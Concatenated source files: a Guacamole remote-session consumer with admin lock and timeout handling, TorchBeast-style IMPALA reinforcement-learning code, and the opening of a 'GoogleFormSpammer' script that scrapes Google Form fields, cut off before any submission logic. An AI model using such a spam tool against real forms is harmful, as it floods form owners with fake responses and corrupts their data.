self.remote_host.get_protocol_display(),
self.remote_host.port,
self.remote_host.remote_user.username,
'',
self.guacamoleclient.res_file,
self.client,
self.user_agent,
self.start_time,
)
except Exception:
pass
TerminalSession.objects.filter(name=self.channel_name, group=self.group).delete()
def receive(self, text_data=None, bytes_data=None):
if not self.lock:
self.guacamoleclient.shell(text_data)
if not text_data.startswith('4.sync') and not text_data.startswith('3.nop'):
self.last_operation_time = time.time()
else:
if text_data.startswith('4.sync') or text_data.startswith('3.nop'):
self.guacamoleclient.shell(text_data)
else:
if re.match(r'^5\.mouse,.*1\.1;$', text_data) or re.match(r'^3\.key,.*1\.1;$', text_data):
message = str(base64.b64encode('当前会话已被管理员锁定'.encode('utf-8')), 'utf-8')
self.send('6.toastr,1.1,{0}.{1};'.format(len(message), message)) # 给客户端发送警告
# 会话外使用 channels.layers 设置 type 为 group.message 调用此函数
def group_message(self, data):
try:
self.send(data['text'])
except Exception:
pass
# 会话外使用 channels.layers 设置 type 为 close.message 调用此函数
def close_message(self, data):
try:
message = str(base64.b64encode('当前会话已被管理员关闭'.encode('utf-8')), 'utf-8')
# 给客户端发送toastr警告
# 需要在 guacamole/js/all.js 中自定义 toastr 的处理处理方法
self.send('6.toastr,1.2,{0}.{1};'.format(len(message), message))
self.close()
except Exception:
pass
def lock_message(self, data):
if not self.lock:
self.lock = True
message = str(base64.b64encode('当前会话已被管理员锁定'.encode('utf-8')), 'utf-8')
self.send('6.toastr,1.1,{0}.{1};'.format(len(message), message))
def unlock_message(self, data):
if self.lock:
self.lock = False
message = str(base64.b64encode('当前会话已被管理员解锁'.encode('utf-8')), 'utf-8')
self.send('6.toastr,1.0,{0}.{1};'.format(len(message), message))
def check_timeout(self, sleep_time=3):
while 1:
if self.closed:
break
if int(time.time() - self.last_operation_time) >= terminal_exipry_time:
try:
message = str(base64.b64encode('由于长时间没有操作或者没有数据返回,连接已断开!'.encode('utf-8')), 'utf-8')
self.send('6.toastr,1.2,{0}.{1};'.format(len(message), message))
self.close()
except Exception:
pass
break
time.sleep(sleep_time)
|
impala_original.py
|
# # https://github.com/facebookresearch/torchbeast/blob/master/torchbeast/core/environment.py
import numpy as np
from collections import deque
import gym
from gym import spaces
import cv2
cv2.ocl.setUseOpenCL(False)
class NoopResetEnv(gym.Wrapper):
def __init__(self, env, noop_max=30):
"""Sample initial states by taking random number of no-ops on reset.
No-op is assumed to be action 0.
"""
gym.Wrapper.__init__(self, env)
self.noop_max = noop_max
self.override_num_noops = None
self.noop_action = 0
assert env.unwrapped.get_action_meanings()[0] == 'NOOP'
def reset(self, **kwargs):
""" Do no-op action for a number of steps in [1, noop_max]."""
self.env.reset(**kwargs)
if self.override_num_noops is not None:
noops = self.override_num_noops
else:
noops = self.unwrapped.np_random.randint(1, self.noop_max + 1) #pylint: disable=E1101
assert noops > 0
obs = None
for _ in range(noops):
obs, _, done, _ = self.env.step(self.noop_action)
if done:
obs = self.env.reset(**kwargs)
return obs
def step(self, ac):
return self.env.step(ac)
class FireResetEnv(gym.Wrapper):
def __init__(self, env):
"""Take action on reset for environments that are fixed until firing."""
gym.Wrapper.__init__(self, env)
assert env.unwrapped.get_action_meanings()[1] == 'FIRE'
assert len(env.unwrapped.get_action_meanings()) >= 3
def reset(self, **kwargs):
self.env.reset(**kwargs)
obs, _, done, _ = self.env.step(1)
if done:
self.env.reset(**kwargs)
obs, _, done, _ = self.env.step(2)
if done:
self.env.reset(**kwargs)
return obs
def step(self, ac):
return self.env.step(ac)
class EpisodicLifeEnv(gym.Wrapper):
def __init__(self, env):
"""Make end-of-life == end-of-episode, but only reset on true game over.
Done by DeepMind for the DQN and co. since it helps value estimation.
"""
gym.Wrapper.__init__(self, env)
self.lives = 0
self.was_real_done = True
def step(self, action):
obs, reward, done, info = self.env.step(action)
self.was_real_done = done
# check current lives, make loss of life terminal,
# then update lives to handle bonus lives
lives = self.env.unwrapped.ale.lives()
if lives < self.lives and lives > 0:
# for Qbert sometimes we stay in lives == 0 condition for a few frames
# so it's important to keep lives > 0, so that we only reset once
# the environment advertises done.
done = True
self.lives = lives
return obs, reward, done, info
def reset(self, **kwargs):
"""Reset only when lives are exhausted.
This way all states are still reachable even though lives are episodic,
and the learner need not know about any of this behind-the-scenes.
"""
if self.was_real_done:
obs = self.env.reset(**kwargs)
else:
# no-op step to advance from terminal/lost life state
obs, _, _, _ = self.env.step(0)
self.lives = self.env.unwrapped.ale.lives()
return obs
class MaxAndSkipEnv(gym.Wrapper):
def __init__(self, env, skip=4):
"""Return only every `skip`-th frame"""
gym.Wrapper.__init__(self, env)
# most recent raw observations (for max pooling across time steps)
self._obs_buffer = np.zeros((2,)+env.observation_space.shape, dtype=np.uint8)
self._skip = skip
def step(self, action):
"""Repeat action, sum reward, and max over last observations."""
total_reward = 0.0
done = None
for i in range(self._skip):
obs, reward, done, info = self.env.step(action)
if i == self._skip - 2: self._obs_buffer[0] = obs
if i == self._skip - 1: self._obs_buffer[1] = obs
total_reward += reward
if done:
break
# Note that the observation on the done=True frame
# doesn't matter
max_frame = self._obs_buffer.max(axis=0)
return max_frame, total_reward, done, info
def reset(self, **kwargs):
return self.env.reset(**kwargs)
class ClipRewardEnv(gym.RewardWrapper):
def __init__(self, env):
gym.RewardWrapper.__init__(self, env)
def reward(self, reward):
"""Bin reward to {+1, 0, -1} by its sign."""
return np.sign(reward)
class WarpFrame(gym.ObservationWrapper):
def __init__(self, env, width=84, height=84, grayscale=True, dict_space_key=None):
"""
Warp frames to 84x84 as done in the Nature paper and later work.
If the environment uses dictionary observations, `dict_space_key` can be specified which indicates which
observation should be warped.
"""
super().__init__(env)
self._width = width
self._height = height
self._grayscale = grayscale
self._key = dict_space_key
if self._grayscale:
num_colors = 1
else:
num_colors = 3
new_space = gym.spaces.Box(
low=0,
high=255,
shape=(self._height, self._width, num_colors),
dtype=np.uint8,
)
if self._key is None:
original_space = self.observation_space
self.observation_space = new_space
else:
original_space = self.observation_space.spaces[self._key]
self.observation_space.spaces[self._key] = new_space
assert original_space.dtype == np.uint8 and len(original_space.shape) == 3
def observation(self, obs):
if self._key is None:
frame = obs
else:
frame = obs[self._key]
if self._grayscale:
frame = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)
frame = cv2.resize(
frame, (self._width, self._height), interpolation=cv2.INTER_AREA
)
if self._grayscale:
frame = np.expand_dims(frame, -1)
if self._key is None:
obs = frame
else:
obs = obs.copy()
obs[self._key] = frame
return obs
class FrameStack(gym.Wrapper):
def __init__(self, env, k):
"""Stack k last frames.
Returns lazy array, which is much more memory efficient.
See Also
--------
baselines.common.atari_wrappers.LazyFrames
"""
gym.Wrapper.__init__(self, env)
self.k = k
self.frames = deque([], maxlen=k)
shp = env.observation_space.shape
self.observation_space = spaces.Box(low=0, high=255, shape=(shp[:-1] + (shp[-1] * k,)), dtype=env.observation_space.dtype)
def reset(self):
ob = self.env.reset()
for _ in range(self.k):
self.frames.append(ob)
return self._get_ob()
def step(self, action):
ob, reward, done, info = self.env.step(action)
self.frames.append(ob)
return self._get_ob(), reward, done, info
def _get_ob(self):
assert len(self.frames) == self.k
return LazyFrames(list(self.frames))
class ScaledFloatFrame(gym.ObservationWrapper):
def __init__(self, env):
gym.ObservationWrapper.__init__(self, env)
self.observation_space = gym.spaces.Box(low=0, high=1, shape=env.observation_space.shape, dtype=np.float32)
def observation(self, observation):
# careful! This undoes the memory optimization, use
# with smaller replay buffers only.
return np.array(observation).astype(np.float32) / 255.0
class LazyFrames(object):
def __init__(self, frames):
"""This object ensures that common frames between the observations are only stored once.
It exists purely to optimize memory usage which can be huge for DQN's 1M frames replay
buffers.
This object should only be converted to numpy array before being passed to the model.
You'd not believe how complex the previous solution was."""
self._frames = frames
self._out = None
def _force(self):
if self._out is None:
self._out = np.concatenate(self._frames, axis=-1)
self._frames = None
return self._out
def __array__(self, dtype=None):
out = self._force()
if dtype is not None:
out = out.astype(dtype)
return out
def __len__(self):
return len(self._force())
def __getitem__(self, i):
return self._force()[i]
def count(self):
frames = self._force()
return frames.shape[frames.ndim - 1]
def frame(self, i):
return self._force()[..., i]
def make_atari(env_id, max_episode_steps=None):
env = gym.make(env_id)
assert 'NoFrameskip' in env.spec.id
env = NoopResetEnv(env, noop_max=30)
env = MaxAndSkipEnv(env, skip=4)
assert max_episode_steps is None
return env
def wrap_deepmind(env, episode_life=True, clip_rewards=True, frame_stack=False, scale=False):
"""Configure environment for DeepMind-style Atari.
"""
if episode_life:
env = EpisodicLifeEnv(env)
if 'FIRE' in env.unwrapped.get_action_meanings():
env = FireResetEnv(env)
env = WarpFrame(env)
if scale:
env = ScaledFloatFrame(env)
if clip_rewards:
env = ClipRewardEnv(env)
if frame_stack:
env = FrameStack(env, 4)
return env
class ImageToPyTorch(gym.ObservationWrapper):
"""
Image shape to channels x weight x height
"""
def __init__(self, env):
super(ImageToPyTorch, self).__init__(env)
old_shape = self.observation_space.shape
self.observation_space = gym.spaces.Box(
low=0,
high=255,
shape=(old_shape[-1], old_shape[0], old_shape[1]),
dtype=np.uint8,
)
def observation(self, observation):
return np.transpose(observation, axes=(2, 0, 1))
def wrap_pytorch(env):
return ImageToPyTorch(env)
"""Naive profiling using timeit. (Used in MonoBeast.)"""
import collections
import timeit
class Timings:
"""Not thread-safe."""
def __init__(self):
self._means = collections.defaultdict(int)
self._vars = collections.defaultdict(int)
self._counts = collections.defaultdict(int)
self.reset()
def reset(self):
self.last_time = timeit.default_timer()
def time(self, name):
"""Save an update for event `name`.
Nerd alarm: We could just store a
collections.defaultdict(list)
and compute means and standard deviations at the end. But thanks to the
clever math in Sutton-Barto
(http://www.incompleteideas.net/book/first/ebook/node19.html) and
https://math.stackexchange.com/a/103025/5051 we can update both the
means and the stds online. O(1) FTW!
"""
now = timeit.default_timer()
x = now - self.last_time
self.last_time = now
n = self._counts[name]
mean = self._means[name] + (x - self._means[name]) / (n + 1)
var = (
n * self._vars[name] + n * (self._means[name] - mean) ** 2 + (x - mean) ** 2
) / (n + 1)
self._means[name] = mean
self._vars[name] = var
self._counts[name] += 1
def means(self):
return self._means
def vars(self):
return self._vars
def stds(self):
return {k: v ** 0.5 for k, v in self._vars.items()}
def summary(self, prefix=""):
means = self.means()
stds = self.stds()
total = sum(means.values())
result = prefix
for k in sorted(means, key=means.get, reverse=True):
result += f"\n %s: %.6fms +- %.6fms (%.2f%%) " % (
k,
1000 * means[k],
1000 * stds[k],
100 * means[k] / total,
)
result += "\nTotal: %.6fms" % (1000 * total)
return result
import argparse
import logging
import os
import pprint
import threading
import time
import timeit
import traceback
import typing
os.environ["OMP_NUM_THREADS"] = "1" # Necessary for multithreading.
import torch
from torch import multiprocessing as mp
from torch import nn
from torch.nn import functional as F
# yapf: disable
parser = argparse.ArgumentParser(description="PyTorch Scalable Agent")
parser.add_argument("--env", type=str, default="PongNoFrameskip-v4",
help="Gym environment.")
parser.add_argument("--mode", default="train",
choices=["train", "test", "test_render"],
help="Training or test mode.")
parser.add_argument("--xpid", default=None,
help="Experiment id (default: None).")
# Training settings.
parser.add_argument("--disable_checkpoint", action="store_true",
help="Disable saving checkpoint.")
parser.add_argument("--savedir", default="~/logs/torchbeast",
help="Root dir where experiment data will be saved.")
parser.add_argument("--num_actors", default=4, type=int, metavar="N",
help="Number of actors (default: 4).")
parser.add_argument("--total_steps", default=100000, type=int, metavar="T",
help="Total environment steps to train for.")
parser.add_argument("--batch_size", default=8, type=int, metavar="B",
help="Learner batch size.")
parser.add_argument("--unroll_length", default=80, type=int, metavar="T",
help="The unroll length (time dimension).")
parser.add_argument("--num_buffers", default=None, type=int,
metavar="N", help="Number of shared-memory buffers.")
parser.add_argument("--num_learner_threads", "--num_threads", default=2, type=int,
metavar="N", help="Number learner threads.")
parser.add_argument("--disable_cuda", action="store_true",
help="Disable CUDA.")
parser.add_argument("--use_lstm", action="store_true",
help="Use LSTM in agent model.")
# Loss settings.
parser.add_argument("--entropy_cost", default=0.0006,
type=float, help="Entropy cost/multiplier.")
parser.add_argument("--baseline_cost", default=0.5,
type=float, help="Baseline cost/multiplier.")
parser.add_argument("--discounting", default=0.99,
type=float, help="Discounting factor.")
parser.add_argument("--reward_clipping", default="abs_one",
choices=["abs_one", "none"],
help="Reward clipping.")
# Optimizer settings.
parser.add_argument("--learning_rate", default=0.00048,
type=float, metavar="LR", help="Learning rate.")
parser.add_argument("--alpha", default=0.99, type=float,
help="RMSProp smoothing constant.")
parser.add_argument("--momentum", default=0, type=float,
help="RMSProp momentum.")
parser.add_argument("--epsilon", default=0.01, type=float,
help="RMSProp epsilon.")
parser.add_argument("--grad_norm_clipping", default=40.0, type=float,
help="Global gradient norm clip.")
# yapf: enable
def _format_frame(frame):
frame = torch.from_numpy(frame)
return frame.view((1, 1) + frame.shape) # (...) -> (T,B,...).
class Environment:
def __init__(self, gym_env):
self.gym_env = gym_env
self.episode_return = None
self.episode_step = None
def initial(self):
initial_reward = torch.zeros(1, 1)
# This supports only single-tensor actions ATM.
initial_last_action = torch.zeros(1, 1, dtype=torch.int64)
self.episode_return = torch.zeros(1, 1)
self.episode_step = torch.zeros(1, 1, dtype=torch.int32)
initial_done = torch.ones(1, 1, dtype=torch.uint8)
initial_frame = _format_frame(self.gym_env.reset())
return dict(
frame=initial_frame,
reward=initial_reward,
done=initial_done,
episode_return=self.episode_return,
episode_step=self.episode_step,
last_action=initial_last_action,
)
def step(self, action):
frame, reward, done, unused_info = self.gym_env.step(action.item())
self.episode_step += 1
self.episode_return += reward
episode_step = self.episode_step
episode_return = self.episode_return
if done:
frame = self.gym_env.reset()
self.episode_return = torch.zeros(1, 1)
self.episode_step = torch.zeros(1, 1, dtype=torch.int32)
frame = _format_frame(frame)
reward = torch.tensor(reward).view(1, 1)
done = torch.tensor(done).view(1, 1)
return dict(
frame=frame,
reward=reward,
done=done,
episode_return=episode_return,
episode_step=episode_step,
last_action=action,
)
def close(self):
self.gym_env.close()
import collections
import torch
import torch.nn.functional as F
VTraceFromLogitsReturns = collections.namedtuple(
"VTraceFromLogitsReturns",
[
"vs",
"pg_advantages",
"log_rhos",
"behavior_action_log_probs",
"target_action_log_probs",
],
)
VTraceReturns = collections.namedtuple("VTraceReturns", "vs pg_advantages")
def action_log_probs(policy_logits, actions):
return -F.nll_loss(
F.log_softmax(torch.flatten(policy_logits, 0, -2), dim=-1),
torch.flatten(actions),
reduction="none",
).view_as(actions)
def from_logits(
behavior_policy_logits,
target_policy_logits,
actions,
discounts,
rewards,
values,
bootstrap_value,
clip_rho_threshold=1.0,
clip_pg_rho_threshold=1.0,
):
"""V-trace for softmax policies."""
target_action_log_probs = action_log_probs(target_policy_logits, actions)
behavior_action_log_probs = action_log_probs(behavior_policy_logits, actions)
log_rhos = target_action_log_probs - behavior_action_log_probs
vtrace_returns = from_importance_weights(
log_rhos=log_rhos,
discounts=discounts,
rewards=rewards,
values=values,
bootstrap_value=bootstrap_value,
clip_rho_threshold=clip_rho_threshold,
clip_pg_rho_threshold=clip_pg_rho_threshold,
)
return VTraceFromLogitsReturns(
log_rhos=log_rhos,
behavior_action_log_probs=behavior_action_log_probs,
target_action_log_probs=target_action_log_probs,
**vtrace_returns._asdict(),
)
@torch.no_grad()
def from_importance_weights(
log_rhos,
discounts,
rewards,
values,
bootstrap_value,
clip_rho_threshold=1.0,
clip_pg_rho_threshold=1.0,
):
"""V-trace from log importance weights."""
with torch.no_grad():
rhos = torch.exp(log_rhos)
if clip_rho_threshold is not None:
clipped_rhos = torch.clamp(rhos, max=clip_rho_threshold)
else:
clipped_rhos = rhos
cs = torch.clamp(rhos, max=1.0)
# Append bootstrapped value to get [v1, ..., v_t+1]
values_t_plus_1 = torch.cat(
[values[1:], torch.unsqueeze(bootstrap_value, 0)], dim=0
)
deltas = clipped_rhos * (rewards + discounts * values_t_plus_1 - values)
acc = torch.zeros_like(bootstrap_value)
result = []
for t in range(discounts.shape[0] - 1, -1, -1):
acc = deltas[t] + discounts[t] * cs[t] * acc
result.append(acc)
result.reverse()
vs_minus_v_xs = torch.stack(result)
# Add V(x_s) to get v_s.
vs = torch.add(vs_minus_v_xs, values)
# Advantage for policy gradient.
broadcasted_bootstrap_values = torch.ones_like(vs[0]) * bootstrap_value
vs_t_plus_1 = torch.cat(
[vs[1:], broadcasted_bootstrap_values.unsqueeze(0)], dim=0
)
if clip_pg_rho_threshold is not None:
clipped_pg_rhos = torch.clamp(rhos, max=clip_pg_rho_threshold)
else:
clipped_pg_rhos = rhos
pg_advantages = clipped_pg_rhos * (rewards + discounts * vs_t_plus_1 - values)
# Make sure no gradients backpropagated through the returned values.
return VTraceReturns(vs=vs, pg_advantages=pg_advantages)
logging.basicConfig(
format=(
"[%(levelname)s:%(process)d %(module)s:%(lineno)d %(asctime)s] " "%(message)s"
),
level=0,
)
Buffers = typing.Dict[str, typing.List[torch.Tensor]]
def compute_baseline_loss(advantages):
return 0.5 * torch.sum(advantages ** 2)
def compute_entropy_loss(logits):
"""Return the entropy loss, i.e., the negative entropy of the policy."""
policy = F.softmax(logits, dim=-1)
log_policy = F.log_softmax(logits, dim=-1)
return torch.sum(policy * log_policy)
def compute_policy_gradient_loss(logits, actions, advantages):
cross_entropy = F.nll_loss(
F.log_softmax(torch.flatten(logits, 0, 1), dim=-1),
target=torch.flatten(actions, 0, 1),
reduction="none",
)
cross_entropy = cross_entropy.view_as(advantages)
return torch.sum(cross_entropy * advantages.detach())
def act(
flags,
actor_index: int,
free_queue: mp.SimpleQueue,
full_queue: mp.SimpleQueue,
model: torch.nn.Module,
buffers: Buffers,
initial_agent_state_buffers,
):
try:
logging.info("Actor %i started.", actor_index)
timings = Timings() # Keep track of how fast things are.
gym_env = create_env(flags)
seed = actor_index ^ int.from_bytes(os.urandom(4), byteorder="little")
gym_env.seed(seed)
env = Environment(gym_env)
env_output = env.initial()
agent_state = model.initial_state(batch_size=1)
agent_output, unused_state = model(env_output, agent_state)
while True:
index = free_queue.get()
if index is None:
break
# Write old rollout end.
for key in env_output:
buffers[key][index][0, ...] = env_output[key]
for key in agent_output:
buffers[key][index][0, ...] = agent_output[key]
for i, tensor in enumerate(agent_state):
initial_agent_state_buffers[index][i][...] = tensor
# Do new rollout.
for t in range(flags.unroll_length):
timings.reset()
with torch.no_grad():
agent_output, agent_state = model(env_output, agent_state)
timings.time("model")
env_output = env.step(agent_output["action"])
timings.time("step")
for key in env_output:
buffers[key][index][t + 1, ...] = env_output[key]
for key in agent_output:
buffers[key][index][t + 1, ...] = agent_output[key]
timings.time("write")
full_queue.put(index)
if actor_index == 0:
logging.info("Actor %i: %s", actor_index, timings.summary())
except KeyboardInterrupt:
pass # Return silently.
except Exception as e:
logging.error("Exception in worker process %i", actor_index)
traceback.print_exc()
print()
raise e
def get_batch(
flags,
free_queue: mp.SimpleQueue,
full_queue: mp.SimpleQueue,
buffers: Buffers,
initial_agent_state_buffers,
timings,
lock=threading.Lock(),
):
with lock:
timings.time("lock")
indices = [full_queue.get() for _ in range(flags.batch_size)]
timings.time("dequeue")
batch = {
key: torch.stack([buffers[key][m] for m in indices], dim=1) for key in buffers
}
initial_agent_state = (
torch.cat(ts, dim=1)
for ts in zip(*[initial_agent_state_buffers[m] for m in indices])
)
timings.time("batch")
for m in indices:
free_queue.put(m)
timings.time("enqueue")
batch = {k: t.to(device=flags.device, non_blocking=True) for k, t in batch.items()}
initial_agent_state = tuple(
t.to(device=flags.device, non_blocking=True) for t in initial_agent_state
)
timings.time("device")
return batch, initial_agent_state
def create_buffers(flags, obs_shape, num_actions) -> Buffers:
T = flags.unroll_length
specs = dict(
frame=dict(size=(T + 1, *obs_shape), dtype=torch.uint8),
reward=dict(size=(T + 1,), dtype=torch.float32),
done=dict(size=(T + 1,), dtype=torch.bool),
episode_return=dict(size=(T + 1,), dtype=torch.float32),
episode_step=dict(size=(T + 1,), dtype=torch.int32),
policy_logits=dict(size=(T + 1, num_actions), dtype=torch.float32),
baseline=dict(size=(T + 1,), dtype=torch.float32),
last_action=dict(size=(T + 1,), dtype=torch.int64),
action=dict(size=(T + 1,), dtype=torch.int64),
)
buffers: Buffers = {key: [] for key in specs}
for _ in range(flags.num_buffers):
for key in buffers:
buffers[key].append(torch.empty(**specs[key]).share_memory_())
return buffers
class AtariNet(nn.Module):
def __init__(self, observation_shape, num_actions, use_lstm=False):
super(AtariNet, self).__init__()
self.observation_shape = observation_shape
self.num_actions = num_actions
# Feature extraction.
self.conv1 = nn.Conv2d(
in_channels=self.observation_shape[0],
out_channels=32,
kernel_size=8,
stride=4,
)
self.conv2 = nn.Conv2d(32, 64, kernel_size=4, stride=2)
self.conv3 = nn.Conv2d(64, 64, kernel_size=3, stride=1)
# Fully connected layer.
self.fc = nn.Linear(3136, 512)
# FC output size + one-hot of last action + last reward.
core_output_size = self.fc.out_features + num_actions + 1
self.use_lstm = use_lstm
if use_lstm:
self.core = nn.LSTM(core_output_size, core_output_size, 2)
self.policy = nn.Linear(core_output_size, self.num_actions)
self.baseline = nn.Linear(core_output_size, 1)
def initial_state(self, batch_size):
if not self.use_lstm:
return tuple()
return tuple(
torch.zeros(self.core.num_layers, batch_size, self.core.hidden_size)
for _ in range(2)
)
def forward(self, inputs, core_state=()):
x = inputs["frame"] # [T, B, C, H, W].
T, B, *_ = x.shape
x = torch.flatten(x, 0, 1) # Merge time and batch.
x = x.float() / 255.0
x = F.relu(self.conv1(x))
x = F.relu(self.conv2(x))
x = F.relu(self.conv3(x))
x = x.view(T * B, -1)
x = F.relu(self.fc(x))
one_hot_last_action = F.one_hot(
inputs["last_action"].view(T * B), self.num_actions
).float()
clipped_reward = torch.clamp(inputs["reward"], -1, 1).view(T * B, 1)
core_input = torch.cat([x, clipped_reward, one_hot_last_action], dim=-1)
if self.use_lstm:
core_input = core_input.view(T, B, -1)
core_output_list = []
notdone = (~inputs["done"]).float()
for input, nd in zip(core_input.unbind(), notdone.unbind()):
# Reset core state to zero whenever an episode ended.
# Make `done` broadcastable with (num_layers, B, hidden_size)
# states:
nd = nd.view(1, -1, 1)
core_state = tuple(nd * s for s in core_state)
output, core_state = self.core(input.unsqueeze(0), core_state)
core_output_list.append(output)
core_output = torch.flatten(torch.cat(core_output_list), 0, 1)
else:
core_output = core_input
core_state = tuple()
policy_logits = self.policy(core_output)
baseline = self.baseline(core_output)
if self.training:
action = torch.multinomial(F.softmax(policy_logits, dim=1), num_samples=1)
else:
# Don't sample when testing.
action = torch.argmax(policy_logits, dim=1)
policy_logits = policy_logits.view(T, B, self.num_actions)
baseline = baseline.view(T, B)
action = action.view(T, B)
return (
dict(policy_logits=policy_logits, baseline=baseline, action=action),
core_state,
)
Net = AtariNet
def create_env(flags):
return wrap_pytorch(
wrap_deepmind(
make_atari(flags.env),
clip_rewards=False,
frame_stack=True,
scale=False,
)
)
flags = parser.parse_args()
if flags.xpid is None:
flags.xpid = "torchbeast-%s" % time.strftime("%Y%m%d-%H%M%S")
checkpointpath = os.path.expandvars(
os.path.expanduser("%s/%s/%s" % (flags.savedir, flags.xpid, "model.tar"))
)
if flags.num_buffers is None: # Set sensible default for num_buffers.
flags.num_buffers = max(2 * flags.num_actors, flags.batch_size)
if flags.num_actors >= flags.num_buffers:
raise ValueError("num_buffers should be larger than num_actors")
if flags.num_buffers < flags.batch_size:
raise ValueError("num_buffers should be larger than batch_size")
T = flags.unroll_length
B = flags.batch_size
flags.device = None
if not flags.disable_cuda and torch.cuda.is_available():
logging.info("Using CUDA.")
flags.device = torch.device("cuda")
else:
logging.info("Not using CUDA.")
flags.device = torch.device("cpu")
env = create_env(flags)
model = Net(env.observation_space.shape, env.action_space.n, flags.use_lstm)
buffers = create_buffers(flags, env.observation_space.shape, model.num_actions)
model.share_memory()
# Add initial RNN state.
initial_agent_state_buffers = []
for _ in range(flags.num_buffers):
state = model.initial_state(batch_size=1)
for t in state:
t.share_memory_()
initial_agent_state_buffers.append(state)
actor_processes = []
ctx = mp.get_context("fork")
free_queue = ctx.SimpleQueue()
full_queue = ctx.SimpleQueue()
for i in range(flags.num_actors):
actor = ctx.Process(
target=act,
args=(
flags,
i,
free_queue,
full_queue,
model,
buffers,
initial_agent_state_buffers,
),
)
actor.start()
actor_processes.append(actor)
learner_model = Net(
env.observation_space.shape, env.action_space.n, flags.use_lstm
).to(device=flags.device)
optimizer = torch.optim.RMSprop(
learner_model.parameters(),
lr=flags.learning_rate,
momentum=flags.momentum,
eps=flags.epsilon,
alpha=flags.alpha,
)
def lr_lambda(epoch):
return 1 - min(epoch * T * B, flags.total_steps) / flags.total_steps
scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lr_lambda)
logger = logging.getLogger("logfile")
stat_keys = [
"total_loss",
"mean_episode_return",
"pg_loss",
"baseline_loss",
"entropy_loss",
]
logger.info("# Step\t%s", "\t".join(stat_keys))
step, stats = 0, {}
def batch_and_learn(i, lock=threading.Lock()):
"""Thread target for the learning process."""
global step, stats
timings = Timings()
while step < flags.total_steps:
timings.reset()
batch, agent_state = get_batch(
flags,
free_queue,
full_queue,
buffers,
initial_agent_state_buffers,
timings,
)
actor_model = model
initial_agent_state = agent_state
"""Performs a learning (optimization) step."""
with lock:
learner_outputs, unused_state = learner_model(batch, initial_agent_state)
# Take final value function slice for bootstrapping.
bootstrap_value = learner_outputs["baseline"][-1]
# Move from obs[t] -> action[t] to action[t] -> obs[t].
batch = {key: tensor[1:] for key, tensor in batch.items()}
learner_outputs = {key: tensor[:-1] for key, tensor in learner_outputs.items()}
rewards = batch["reward"]
if flags.reward_clipping == "abs_one":
clipped_rewards = torch.clamp(rewards, -1, 1)
elif flags.reward_clipping == "none":
clipped_rewards = rewards
discounts = (~batch["done"]).float() * flags.discounting
vtrace_returns = from_logits(
behavior_policy_logits=batch["policy_logits"],
target_policy_logits=learner_outputs["policy_logits"],
actions=batch["action"],
discounts=discounts,
rewards=clipped_rewards,
values=learner_outputs["baseline"],
bootstrap_value=bootstrap_value,
)
pg_loss = compute_policy_gradient_loss(
learner_outputs["policy_logits"],
batch["action"],
vtrace_returns.pg_advantages,
)
baseline_loss = flags.baseline_cost * compute_baseline_loss(
vtrace_returns.vs - learner_outputs["baseline"]
)
entropy_loss = flags.entropy_cost * compute_entropy_loss(
learner_outputs["policy_logits"]
)
total_loss = pg_loss + baseline_loss + entropy_loss
episode_returns = batch["episode_return"][batch["done"]]
stats = {
"episode_returns": tuple(episode_returns.cpu().numpy()),
"mean_episode_return": torch.mean(episode_returns).item(),
"total_loss": total_loss.item(),
"pg_loss": pg_loss.item(),
"baseline_loss": baseline_loss.item(),
"entropy_loss": entropy_loss.item(),
}
optimizer.zero_grad()
total_loss.backward()
nn.utils.clip_grad_norm_(learner_model.parameters(), flags.grad_norm_clipping)
optimizer.step()
scheduler.step()
actor_model.load_state_dict(learner_model.state_dict())
timings.time("learn")
with lock:
to_log = dict(step=step)
to_log.update({k: stats[k] for k in stat_keys})
# plogger.log(to_log)
step += T * B
if i == 0:
logging.info("Batch and learn: %s", timings.summary())
for m in range(flags.num_buffers):
free_queue.put(m)
threads = []
for i in range(flags.num_learner_threads):
thread = threading.Thread(
target=batch_and_learn, name="batch-and-learn-%d" % i, args=(i,)
)
thread.start()
threads.append(thread)
timer = timeit.default_timer
try:
last_checkpoint_time = timer()
while step < flags.total_steps:
start_step = step
start_time = timer()
time.sleep(5)
sps = (step - start_step) / (timer() - start_time)
if stats.get("episode_returns", None):
mean_return = (
"Return per episode: %.1f. " % stats["mean_episode_return"]
)
else:
mean_return = ""
total_loss = stats.get("total_loss", float("inf"))
logging.info(
"Steps %i @ %.1f SPS. Loss %f. %sStats:\n%s",
step,
sps,
total_loss,
mean_return,
pprint.pformat(stats),
)
except KeyboardInterrupt:
pass
else:
for thread in threads:
thread.join()
logging.info("Learning finished after %d steps.", step)
finally:
for _ in range(flags.num_actors):
free_queue.put(None)
for actor in actor_processes:
actor.join(timeout=1)
|
gfs.py
|
import re
import ast
import time
import random
import string
import requests
import argparse
from enum import Enum
from rich import print
from queue import Queue
from threading import Thread
from tabulate import tabulate
from bs4 import BeautifulSoup
from typing import Dict, List
class FieldType(Enum):
"""
An enum to define all possible field types
"""
SHORT_TEXT = 0
LONG_TEXT = 1
MULTIPLE_CHOICE = 2
CHECKBOX = 3
DROPDOWN = 4
LINEAR_SCALE = 5
MULTI_CHOICE_GRID = 7
DATE = 9
TIME = 10
class Field(object):
"""
A Field object used to define fields
"""
validation: bool
required: bool
has_choices: bool
def __init__(self):
self.type = None
self.name = None
self.id = None
self.choices = []
class Choice(object):
"""
A Choice object used to define choices
"""
def __init__(self):
self.choice_name = None
class GoogleFormSpammerException(Exception):
"""
A class to be raised when errors occur
"""
pass
class GoogleFormSpammer:
"""
A class to hold all functions for the script
"""
def __init__(self, form_url: str = None, required_only: bool = False) -> None:
"""
The class constructor
Parameters:
form_url (str): The URL of the form to be used
required_only (bool): If you only want to fill in the required fields
Raises:
GoogleFormSpammerException: If `form_url` is None or if it is not a valid form url
"""
if form_url is None:
raise GoogleFormSpammerException("form_url cannot be None")
if not re.match(
"https://docs.google.com/forms/d/e/[A-Za-z0-9_-]{56}/formResponse", form_url
):
raise GoogleFormSpammerException("form_url is not valid")
self.form_url = form_url
self.required_only = required_only
self.scraped_data = self._scrape_form()
def _scrape_form(self) -> List[Field]:
"""
A function to scrape the form to get all the required post data
Returns:
fields (List[Field]): A list of fields from the scraped form data
"""
response = requests.get(self.form_url)
soup = BeautifulSoup(response.text, "html.parser")
divs = soup.find_all("div")
replacements = {
"%.@.": "[",
"null": '"null"',
"true": '"true"',
"false": '"false"',
}
fields = []
for div in divs:
# Find all div tags with the attribute `jsmodel`
if "jsmodel" in div.attrs.keys():
data_params = div.attrs.get("data-params")
# Fix array so it can be handled by Python
for old, new in replacements.items():
